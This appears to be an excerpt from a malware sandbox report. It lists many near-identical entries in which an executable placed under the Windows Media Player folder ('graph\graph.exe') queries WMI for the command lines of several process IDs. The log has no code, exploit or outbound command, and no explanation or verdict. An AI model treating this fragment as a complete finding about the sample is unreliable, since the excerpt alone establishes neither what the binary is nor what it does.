                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5376
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5376
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5376
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5376
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5376
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5376
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5376
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5376
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5376
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5376
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8012
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8012
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7844
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7844
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
